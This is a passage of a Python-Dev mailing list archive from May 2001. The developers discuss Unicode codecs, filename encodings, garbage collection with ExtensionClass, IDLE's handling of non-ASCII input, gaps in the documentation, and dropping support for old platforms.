much about it... other > than to ignore the error or remove the codec altogether. On general principle I don't like either of those -- "in the face of ambiguity, refuse the temptation to guess". It's at least surprising to see >>> unicode("?", "cp875").encode("cp875") '\xfd' >>> now, yes? Would it be better if an ambiguous encoding raised an exception in "strict" mode? That is, a third choice is to alert users when they're relying on a broken part of a mapping. From martin@loewis.home.cs.tu-berlin.de Sun May 13 20:08:47 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 21:08:47 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 12:15:46 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> > What if we put these on the implementation, that or came up with a > standard interface on the node. Then, every DOM imp that wants to be > compatible with xpath/xslt needs to support this interface? > > > node.ownerDocument.implementation.releaseNode(node) > > or > > node.py_unlink() releaseNode sounds good to me; it is unlikely that W3C would give an operation that name but a different meaning. Any objections? Regards, Martin From tim.one@home.com Sun May 13 20:45:40 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 15:45:40 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: > http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465& > group_id=5470 > > Category: core (C code) > Group: None > >Status: Closed > >Resolution: Accepted > Priority: 5 > Submitted By: Mark Hammond (mhammond) > Assigned to: Mark Hammond (mhammond) > Summary: Allow pre-encoded strings as filenames > > Initial Comment: > This patch enables most filename parameters to use pre- > encoded strings. On Windows, the default of "mbcs" is > used. On all other platforms, the default filename > encoding is the same as the general default encoding, > which in reality means there is no functional change. > However, other platforms can simply plugin their own > encodings. > ... Mark (or anyone else who understands all this), were doc changes included? Can someone please add a briefer user-oriented blurb to Misc/NEWS too? From tim.one@home.com Sun May 13 21:54:50 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 16:54:50 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid> Message-ID: ]/F] > as a footnote, SRE uses the same source code to generate > both 8-bit and 16-bit versions of the match engine. I see no > reason why we cannot do the same for the string operations > (PyString, PyUnicode, and strop). > > if anyone wants me to look into this, just say "go ahead". go ahead Here's another idea: whenever we fix or extend Python's "%" formats, it requires changes in both stringobject.c and unicodeobject.c, but they've diverged in irritating ways that make it a fresh adventure in each. In the early days, Python handled % formats pretty much by just building a format string and passing that on to C's sprintf. But as the years have gone by, and the number of buggy platforms increased, Python has taken over more & more of it itself. For example, it doesn't trust sprintf to deal with justification, 0-fill or blank-fill, and needed to grow its own from-scratch code for integer conversion in order to handle Python longs. In addition, it also grew a PyErr_Format() routine as yet another layer of simulating what a safe sprintf-alike should do. Even with all that, we've still got platform bugs due to, e.g., platform %#x and %#o conversion adding base markers when "they shouldn't" (according to C), or not adding them when "they should" (according to Python). All in all, the code would be simpler and quicker now if we left the platform sprintf out of sprintf operations entirely . The only thing we're not simulating ourselves is float->string conversion. Unfortunately, we can't do that without also doing string->float, because platforms vary in the float strings they can read back (e.g., if Python does float->string and produces "Inf" for positive infinity, but uses strtod or atof to read floats back in, it's a x-platform crapshoot whether "Inf" can be read back in). but-in-favor-of-merging-the-code-even-without-that-ly y'rs - tim From tim.one@home.com Sun May 13 22:00:32 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 17:00:32 -0400 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com> Message-ID: [skip@pobox.com] > I (thankfully) gave up even pretending to run Windows recently, so > I can only make a suggestion for others who look into this problem. > Try this: > Change test___all__.check_all so that the except clause reads: > > except ImportError, msg: > > then print out msg when an import fails. You should get the actual > module that failed to import. Yes, that confirmed termios was the culprit. Thanks! Fixed by adding import termios del termios in pty.py. As the irritated comment before this new code says, this is absurd. since-you're-on-a-roll-how-about-fixing-test_urllib2-too-ly y'rs - tim From guido@digicool.com Sun May 13 23:26:39 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:26:39 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200." <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com> > > Now, if you are using the 1.4 version of ExtensionClasses you might > > not have the tp_flags field either (I don't know, I can't easily > > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > > even require recompilation to work with Python 2.1. > > I'll attach a copy below of the struct as defined in > pygtk-0.7.0-unstable-dont-use.tar.gz Hmm... I like that filename. :-) > (0.6.6 does not use extension > classes). As you can see, it does not provide tp_flags, but has a > field of tp_xxx4 for it. Sorry, that's what I meant. This is guaranteed to be initialized to 0 (unless a module goes out of its way to put a value in it, in which case they deserve what they get). > That *should* work, except that it also has its 'methods' field where > tp_traverse would go, and its class_flags field where tp_clear would > go. > > Now, you write > > > ExtensionClasses (at least recent versions that worked with 1.5.2) > > contain a copy of the type object up to and including the tp_flags > > field, and the 2.1 code is careful not to use any newer fields > > without first checking the corresponding flag bit. > > In this generality, it is apparently not true: Modules/gcmodule.c has, > in delete_garbage, > > if ((clear = op->ob_type->tp_clear) != NULL) { > ... > traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; > (void) traverse(PyObject_FROM_GC(gc), > (visitproc)visit_decref, > NULL); > > which does not check any flags. That still shouldn't cause any > problems, since the Gtk objects should never end up in the GC lists - > but may be I'm missing something. I agree with your analysis: op here is gotten from a PyGC_Head, so it cannot be a PyExtensionClass instance, so Neil's code should be safe. Objects never have a GC head unless they specifically request it; PyExtensionClass certainly doesn't request a GC head. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sun May 13 23:37:44 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:37:44 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400." References: Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com> > As I said earlier: the only advantage would be if it could simplify > things "under the hood" (compared to metaclasses) but could still > provide the same Class semantics (with maybe a "proto" declaration > sneaking it's nose in under the tent.) > But I have no immediate idea on how to do that, and it sounds like > you're pretty far along into an implementation already. I don't know how to do it either, but I suspect it wouldn't be easy. > I guess my practical quesion, which I meant to ask before I got > myself sidetracked into preaching prototypes is: How much of the > existing plumbing (specifically the Don Beaudry hack) can I rely > on in the future for the objective-C/python bridge ? > With BOOST and Zope's extension classes relying on it, can I > assume that it's being extended rather than replaced ? > ( I guess I ought to take a look at the code! ) I'm currently not too concerned with backwards compatibility, and Jim Fulton has proclaimed that he would prefer to get rid of ExtensionClassess (since what I'm building goes way beyond them!), so I'm not sure I can be motivated to support just for BOOST's sake. There will be a replacement mechanism that will be at least as powerful, and I'm sure that BOOST etc. can be rewritten to use the new mechanism easily. That's what we're planning for Zope. > Guido: did you ever imagine back at that first workshop at NIST > that you and Python would be where you are today ? No way! I knew I was on to something, but I had no idea onto what... I'll always hold on to the T-shirt you made. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sun May 13 23:43:57 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:43:57 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200." <00ca01c0da68$4fc66570$e46940d5@hagrid> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> <00ca01c0da68$4fc66570$e46940d5@hagrid> Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com> > 2.2 is to be released in october, right? I'm sure I could shake > out the remaining bugs in my "stackless SRE" patch until then... Knowing you that means you'd start working on them late September. :-) There's actually a possibility that if my types/classes stuff goes well, Digital Creations will ask for a 2.2 release sooner (e.g. July). This might have an experimental status, e.g. it might not be backwards compatible, but it would be the version required by Zope 2.4. On the other hand, none of that may happen, or that release would be labeled 2.2b1 or something, or Zope 2.4 might come out after October. What I'm trying to say is, please try to fix stackless SRE sooner rather than later! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sun May 13 23:51:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:51:17 -0500 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200." <200105112053.WAA15657@pandora.informatik.hu-berlin.de> References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='äö' > UnicodeError: ASCII encoding error: ordinal not in range(128) This doesn't bother me, because I don't know how to enter such characters with my US keyboard anyway. :-) :-) > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. Yes, this has bitten me once. It was very painful (I lost a few hours worth of writing). In other words, I agree it's a problem! > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. Not me -- unfortunately, there are too many alternatives to IDLE to be able to justify working on it much. > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. Ditto. Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the Python prompt, both on Linux and on Windows 98. It prints as '\xe4\xf6' on both systems. What changed? --Guido van Rossum (home page: http://www.python.org/~guido/) From Mike.Olson@fourthought.com Mon May 14 02:02:03 2001 From: Mike.Olson@fourthought.com (Mike Olson) Date: Sun, 13 May 2001 19:02:03 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> Message-ID: <3AFF2E8B.31B9ED97@FourThought.com> "Martin v. Loewis" wrote: > > > What if we put these on the implementation, that or came up with a > > standard interface on the node. Then, every DOM imp that wants to be > > compatible with xpath/xslt needs to support this interface? > > > > > > node.ownerDocument.implementation.releaseNode(node) > > > > or > > > > node.py_unlink() > > releaseNode sounds good to me; it is unlikely that W3C would give an > operation that name but a different meaning. Any objections? Should we standardize all of the python xml extensions with a py prefix? pyReleaseNode or py_releaseNode? Then we will never have to worry about a name clash. Mike > > Regards, > Martin -- Mike Olson Principal Consultant mike.olson@fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From MarkH@ActiveState.com Mon May 14 02:37:35 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 11:37:35 +1000 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Tim] > Mark (or anyone else who understands all this), were doc changes included? > Can someone please add a briefer user-oriented blurb to Misc/NEWS too? No problem. Where should the "real" documentation go? It seems maybe we need a new sub-heading under the "6.1 - os -- Misc. OS Interface" - something like: 6.1.x - Unicode and the file system - general discussion. - Windows specific - Mac specific should that appear. - OS' with no special support (ie, "the rest") Does that make sense? I have made this change to Misc/NEWS. Does this look OK (obviously once I know what to replace "[????]" with :) And-I-will-do-the-registry-docs-at-the-same-time ly, Mark. Index: NEWS =================================================================== RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v retrieving revision 1.166 diff -r1.166 NEWS 4a5,21 > - Some operating systems now support the concept of a default Unicode > encoding for file system operations. Notably, Windows supports 'mbcs' > as the default. The Macintosh will also adopt this concept in the medium > term, altough the default encoding for that platform will be other than > 'mbcs'. > On operating system that support non-ascii filenames, it is common for > functions that return filenames (such as os.listdir()) to return Python > string objects pre-encoded using the default file system encoding for > the platform. As this encoding is likely to be different from Python's > default encoding, converting this name to a Unicode object before passing > it back to the Operating System would result in a Unicode error, as Python > would attempt to use it's default encoding (generally ASCII) rather > than the default encoding for the file system. > In general, this change simply removes surprises when working with > Unicode and the file system, making these operations work as > you expect, increasing the transparency of Unicode objects in this context. > See [????] for more details, including examples. From tim.one@home.com Mon May 14 03:52:22 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 22:52:22 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Mark Hammond] > ... > Where should the "real" documentation go? It seems maybe we need a > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > like: > > 6.1.x - Unicode and the file system > - general discussion. > - Windows specific > - Mac specific should that appear. > - OS' with no special support (ie, "the rest") > > Does that make sense? So far is it goes, yes. I think the manual desperately needs a Unicode section for other reasons, though: from traffic on c.l.py, it's clear that few people can figure out how to do *anything* with Unicode now unless their first name begins with "M" (Mark, Martin, Marc -- definitely not Skip ). There's no overview and there are no examples. The primary string method doesn't even mention Unicode (here paraphrasing questions that pop up): encode([encoding[,errors]]) Return an encoded version of the string. What does "encoded version" mean? Is that another string? An encoding object of some sort? Etc. Default encoding is the current default string encoding. What's the "current default string encoding"? How can I find out? Can't even guess what *type* it has (string? magic object? little integer?). If I don't want the default encoding, how do I specify a different one? What are the possible values? Again, can't even guess the type of the object that needs to be passed for encoding. errors may be given to set a different error handling scheme. The default for errors is 'strict', meaning that encoding errors raise a ValueError. Other possible values are 'ignore' and 'replace'. So what do 'ignore' and 'replace' mean? There's more left unsaid here than a single example could clarify, but there's not even an example -- so people stare at this wholly uncomprehending. If they stumble into the unicode() builtin function (in a different part of the manual, neither referencing nor referenced by the .encode() method), it's no better: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. What? Hard to even guess what the function returns. Maybe, from the name, a Unicode string? Error handling is done according to errors. What? The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. How do encoding errors arise from a function that *de*codes? See also the codecs module. Which helps, but the relationship between the codecs module and the unicode() function isn't spelled out there either. Look up "encdoing" in the index, and you get pointers to base64, quoted-printable and the mimetypes module, which only confuses things more. I don't expect you to fix this , I'm trying to get across that the Unicode docs need work even without new gimmicks. If Fred agrees, I'm sure he'll think of a good place to put the new info too. > I have made this change to Misc/NEWS. Does this look OK > (obviously once I know what to replace "[????]" with :) Absolutely, and I don't even have to read it to say so : once *something* is checked in, we're assured it won't get dropped on the floor come release time, and anyone who has any quibbles with it can check in changes. It's not like checking in a NEWS item can break the std test suite or cause HP-UX to crash. well-not-really-sure-about-the-latter-ly y'rs - tim From barry@digicool.com Mon May 14 05:16:18 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 00:16:18 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? References: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: <15103.23570.191115.85137@anthem.wooz.org> >>>>> "FL" == Fredrik Lundh writes: FL> (is Jython using exactly the same hashing and dictionary FL> algorithms as CPython? or does it work by accident also under FL> Jython?) Most likely, it's pure accident. Jython's PyDictionary uses a Java Hashtable underneath, so you're dependent on its behavior. -Barry From esr@thyrsus.com Mon May 14 06:20:17 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 01:20:17 -0400 Subject: [Python-Dev] State of curses tutorial? Message-ID: <20010514012017.A6971@thyrsus.com> A user pointed out a typo in the "Curses Programming with Python" tutorial at . While attempting to fix it, I discovered a few tings: 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it was Andrew, that's OK -- but the reference in the latest version of the library docs still cites him. 2. I don't seem to have the TeX source anymore. Where can I download it? 3. Perhaps it's time to start putting howtos in the nondist part of the CVS tree? -- Eric S. Raymond Power concedes nothing without a demand. It never did, and it never will. Find out just what people will submit to, and you have found out the exact amount of injustice and wrong which will be imposed upon them; and these will continue until they are resisted with either words or blows, or with both. The limits of tyrants are prescribed by the endurance of those whom they oppress. -- Frederick Douglass, August 4, 1857 From greg@cosc.canterbury.ac.nz Mon May 14 06:36:49 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 14 May 2001 17:36:49 +1200 (NZST) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl> Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz> Jack Jansen : > MacOS (<= 9) itself doesn't have chdir, because it doesn't believe > in current directories (by design. Well, it does have an equivalent (HSetVol). But it's not used much by Mac software because it's usual to work with full file specifications at all times, at least internally. >From the user's point of view, the closest thing to a "current directory" is the way the standard file dialogs remember which directory you were browsing in last. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From martin@loewis.home.cs.tu-berlin.de Mon May 14 06:38:24 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 07:38:24 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 19:02:03 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com> Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de> > Should we standardize all of the python xml extensions with a py > prefix? pyReleaseNode or py_releaseNode? Then we will never have to > worry about a name clash. IMO, no. The entire interface together is the Python DOM mapping. In the unlikely event of a name clash, we could still decide to rename the DOM function, or find some other magic (e.g. overloading on the argument count). Regards, Martin From mal@lemburg.com Mon May 14 10:02:19 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:02:19 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3AFF9F1B.A1CDD617@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > The "right" thing to do here, is to simply remove cp875 > > from the test for round-tripping. > > I'm relieved you think so, since that's what I already did . > > > It is not the only encoding which fails this test, but it's not > > our fault: the codecs were all generated from the original codec > > maps at the Unicode.org site. > > > > If their mappings are broken, we can't do much about it... other > > than to ignore the error or remove the codec altogether. > > On general principle I don't like either of those -- "in the face of > ambiguity, refuse the temptation to guess". It's at least surprising to see > > >>> unicode("?", "cp875").encode("cp875") > '\xfd' > >>> > > now, yes? Would it be better if an ambiguous encoding raised an exception in > "strict" mode? That is, a third choice is to alert users when they're > relying on a broken part of a mapping. The problem is: which part would raise the exception -- the encoder or the decoder ? Here are some more options: * sort the items before creating the encoding table from the decoding one (makes the mapping stable) * map keys which have multiple mappings in the encoding table to None -- this causes their usage to raise an exception (undefined mapping) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Mon May 14 10:15:43 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:15:43 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3AFFA23F.248517E3@lemburg.com> Tim Peters wrote: > > [Mark Hammond] > > ... > > Where should the "real" documentation go? It seems maybe we need a > > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > > like: > > > > 6.1.x - Unicode and the file system > > - general discussion. > > - Windows specific > > - Mac specific should that appear. > > - OS' with no special support (ie, "the rest") > > > > Does that make sense? > > So far is it goes, yes. I think the manual desperately needs a Unicode > section for other reasons, though: from traffic on c.l.py, it's clear that > few people can figure out how to do *anything* with Unicode now unless their > first name begins with "M" (Mark, Martin, Marc -- definitely not Skip > ). There's no overview and there are no examples. The primary string > method doesn't even mention Unicode (here paraphrasing questions that pop > up): > [...] True. The main source of documentation for Unicode still is the proposal itself (Misc/unicode.txt). It needs some reordering and a few examples, but does contain all the information needed to grasp what the implementation intends and how it works. If that's still not enough, there are numerous doc-strings in the codecs.py module, more technical docs in the API reference and finally the unicodeobject.h header file itself. Another source for documentation and examples is the i18n-sig page on python.org. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack@oratrix.nl Mon May 14 10:55:26 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 14 May 2001 11:55:26 +0200 Subject: [Python-Dev] Py_FileSystemDefaultEncoding Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl> I'm not too thrilled with the way the filename encoding stuff was done, with a global var declared in posixmodule.c which is then used by bltinmodule.c. It took me quite a while to figure out why my builds were failing, and how to fix it. And I think other minority platforms may have the same problem, so maybe it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an include file, and do the initialization in a more "common" place? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From fredrik@pythonware.com Mon May 14 11:18:49 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Mon, 14 May 2001 12:18:49 +0200 Subject: [Python-Dev] State of curses tutorial? References: <20010514012017.A6971@thyrsus.com> Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff> eric wrote: > > 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it > was Andrew, that's OK -- but the reference in the latest version of the > library docs still cites him. that would be either you (who reworked the document), or andrew (who checked in your changes). looks like fred has already fixed it: Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake Use appropriate markup for multiple authors; LaTeX's \author is not additive; the second occurrance was causing the first author to be dropped. > 2. I don't seem to have the TeX source anymore. Where can I download it? it's in the py-howto CVS tree: http://sourceforge.net/projects/py-howto Cheers /F From loewis@informatik.hu-berlin.de Mon May 14 12:29:21 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:29:21 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com> Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de> > I have a bug report assigned to myself which indicates similar > problems with _tkinter and Tk/Tcl. There were other problem > reports on the German Python mailing list going in the same > direction too. > > The basic problem seems to be that Tk/Tcl applies too much > magic to the text widget contents in order to find out the > used encoding and this can easily cause the whole encoding > mechanism to fail. This is actually a different problem. In this scenario here, the user types non-ASCII character into a text widget, then _tkinter returns a Unicode object (IMO rightfully so). In the other problem, the Python program puts a byte string into a text widget, the user enters some more characters, and _tkinter returns a byte string which does not follow any encoding. > A Tk/Tcl expert should really look into this and fix _tkinter.c > to aid Tk/Tcl in not mixing up the encodings (e.g. it would > probably be a good idea to recode Python 8bit-strings into > whatever encoding Tk/Tcl assumes as default). Again, this is not the issue here: Both _tkinter and Tk behave absolutely correct IMO. The question is how IDLE should deal with it. Regards, Martin From loewis@informatik.hu-berlin.de Mon May 14 12:41:26 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:41:26 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com> Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> > Postscript: using cut and paste, I *can* enter "s=3D'=E4=F6'" in IDLE at = the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? Perhaps the Tcl version? That sounds like the issue that Marc talked about: Tk behaves differently when text is entered programmatically (and perhaps through cut-n-paste), as compared to text entered through the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on Solaris 8 still gives me the UnicodeError. Regards, Martin From MarkH@ActiveState.com Mon May 14 13:20:43 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 22:20:43 +1000 Subject: [Python-Dev] Py_FileSystemDefaultEncoding In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl> Message-ID: > I'm not too thrilled with the way the filename encoding stuff was > done, with a My apologies. I did try and publicise the patch as much as possible. A misguided attempt at a low-impact change :( I have checked in the changes you suggest. Mark. From barry@digicool.com Mon May 14 13:54:59 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 08:54:59 -0400 Subject: [Python-Dev] Unicode docs References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15103.54691.560967.853132@anthem.wooz.org> >>>>> "M" == M writes: M> True. The main source of documentation for Unicode still is the M> proposal itself (Misc/unicode.txt). It needs some reordering M> and a few examples, but does contain all the information needed M> to grasp what the implementation intends and how it works. As a first step, why not PEP-ify that document, much like as has been done with the DB-API (version 1 & 2)? It can be an informational PEP. -Barry From esr@thyrsus.com Mon May 14 16:11:57 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 11:11:57 -0400 Subject: [Python-Dev] State of curses tutorial? In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200 References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff> Message-ID: <20010514111157.C10920@thyrsus.com> Fredrik Lundh : > it's in the py-howto CVS tree: > > http://sourceforge.net/projects/py-howto What module is the Python-HOWTO in? -- Eric S. Raymond "The best we can hope for concerning the people at large is that they be properly armed." -- Alexander Hamilton, The Federalist Papers at 184-188 From skip@pobox.com (Skip Montanaro) Mon May 14 16:54:54 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Mon, 14 May 2001 10:54:54 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <15103.65486.61021.328424@beluga.mojam.com> Martin> That *should* work, except that it also has its 'methods' field Martin> where tp_traverse would go, and its class_flags field where Martin> tp_clear would go. Okay, so I'm completed confused now. I extended the definition of ECTypeType to include this after the doc string slot: (traverseproc)0, /* tp_traverse */ (inquiry)0, /* tp_clear */ (richcmpfunc)0, /* rich comparisons */ 0L, /* weak reference enabler */ #ifdef COUNT_ALLOCS /* these must be last */ 0, /* tp_alloc */ 0, /* tp_free */ 0, /* tp_maxalloc */ (struct _typeobject *)0, /* tp_next */ #endif When I looked at the definition of ECType, after the doc string I saw METHOD_CHAIN(ExtensionClass_methods) as Martin indicated. I can't simply insert the same zeroes at the end of the ECType def'n as I did at the end of the ECTypeType definition. Where does this METHOD_CHAIN thing go? I looked at the def'n of struct _typeobject in Include/object.h but didn't see a slot that looked suitable. FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, I get Fatal Python error: UNREF invalid object when I run my failing script. This is with and without making any changes to ECType or ECTypeType. Skip From sdm7g@Virginia.EDU Mon May 14 18:04:56 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Mon, 14 May 2001 13:04:56 -0400 (EDT) Subject: [Python-Dev] deprecated platforms Message-ID: Jack asked me about: https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470 which concerns removing the support for --with-next-framework from the build procedure. I'm all for removing it: it's broken for OSX, if it worked, it doesn't do the whole job ( I think framework support should eventually be added for OSX with a separate post-build script -- a real framework should encapsulate all of the python libs, docs and headers files in one bundle. ) nobody seems to know if it still works on Next or OpenStep. However, I said I thought there ought to be some sort of official procedure for removing platform support. This doesn't seem to be addressed in either PEP 4 (Deprecation of Standard Modules) or PEP 5 (Guidelines for Language Evolution). I don't think it needs to be as involved a process as PEP 4 or 5 -- it's a more reversable decision than removing a feature from the language. Although, removing a platform dependent feature -- like in the long discussion about case sensitivity -- may be a bigger deal. But I'm really thinking more about things like the Next case -- where there are build options and #ifdefs that, as far as we know, haven't been tested in several versions. ( Believe it or not, there are still folks hanging dearly onto their black NeXT cubes, and finding the useful -- but I have no idea if any of them are using Python, and there's lots of users out there whom we only hear from when they discover a problem. ) Perhaps there should be some sort of "Last Call for Platform Saviour" : if nobody steps forward who is willing to do test builds on that platform, support may be removed if maintaining it is getting in the way. Any thougts or opinions on this? Are there any other platforms where this might become an issue ? If this looks like it's unlikely to crop up again, then maybe we don't need to bother with a 'policy'. What about support for particular compilers and build environments: (Borland C on Windows and MPW on Mac are two examples of "minority" compilers.) BTW: As I've though more about this particular issue (--with-next-framework) I don't think it's as big an issue -- removing that switch isn't going to break the build entirely (I think!). Pulling out all of the #ifdefs for Next would be a larger issue, but that hasn't been proposed 